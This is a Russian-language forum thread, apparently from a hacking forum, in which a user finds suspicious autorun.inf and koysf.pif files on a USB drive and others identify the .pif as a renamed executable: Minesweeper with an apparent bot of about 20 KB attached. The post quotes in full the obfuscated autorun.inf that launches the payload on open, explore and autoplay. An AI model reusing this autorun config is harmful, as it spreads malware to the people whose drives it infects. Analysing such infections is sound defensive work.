• XSS.stack #1 – первый литературный журнал от юзеров форума

шо за уйня?

Отслеживать
b3jiom

b3jiom

RAM
Пользователь
Регистрация
16.03.2009
Сообщения
146
Реакции
0
на флешке у себя обнаружил два лишних файло:

autorun.inf
со следующим содержанием содержанием
Код: 
[AutoRun]
;vIKaEx ilqguh 
sHell\open\dEFaUlt=1
;
sheLl\OPen\COmMAnd = koysf.pif
Open =koysf.pif
;sLCmxaJdtG 
shell\eXpLorE\commaND =koysf.pif
;joXr TiUJMYfblk bseupWOHwe uAEfCj 
ShEll\autoplay\command=koysf.pif
;

и koysf.pif размером 139263 bytes


отчет с вирустотала

проверьте что за хня
:sorry:
 

Вложения

  • 1.rar
    64.6 КБ · Просмотры: 118
ну вообще-то отчет вирустала и должен быть таким, это же как бэ ярлык, посмотри куда он ссылается на какю программу, вот ее и сканируй , ну и сюда подкинь.
в описании ярлыка есть только вот это Игра ''Сапер''

сорь точно файл
 
ты как дитя, а не юзер дамаги))

кроме файла pif - который не палится, вирь цепляет еще и экзешник - который как раз таки палится.
он в корне, или в папочке "recycled".
и АВ его скорее всего убил

я их уморилась чисттить на работе. по статистике заражены 9 из 10 флешек.
 
ну вообще-то отчет вирустала и должен быть таким, это же как бэ ярлык, посмотри куда он ссылается на какю программу, вот ее и сканируй , ну и сюда подкинь.
ren koysf.pif koysf.exe и получаем бинарь. нифига это не ярлык :)

зы. походу бот размером ~20 кб приклеен в оверлей к виндовому сапёру
 
это как бы никуя не ярлык
просто изначально был файл koysf.ехе
его переименовали в koysf.pif
а как всем известно, .pif исполняемый файл

поковырял winmine.exe со своей ОС его вес = 119808
koysf.exe = 139263
т.е. разница в 19455
практически все идентично
разница только в иконках и ровна 1076

ИТОГО чтото приклеено на 20531 bytes


чтото я херню несу не понятную)))
:bang: :nono: :huh1:
 
поковырял winmine.exe со своей ОС его вес = 119808
koysf.exe = 139263
т.е. разница в 19455
практически все идентично
разница только в иконках и ровна 1076

это как?
 
кроме файла pif - который не палится, вирь цепляет еще и экзешник - который как раз таки палится.

если вирь.ехе переименовать в вирь.пиф он палиться так же как и .ехе
если будет вирь.пиф просто лежать, то возможно если не указано в настройках авера, его и не спалит, но при запуске 100% спалит



это как?

чтото я херню несу не понятную)))
вот так вот
смотрел в ResHacker
ибо ничего не нашел на своем ПК на работе(
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх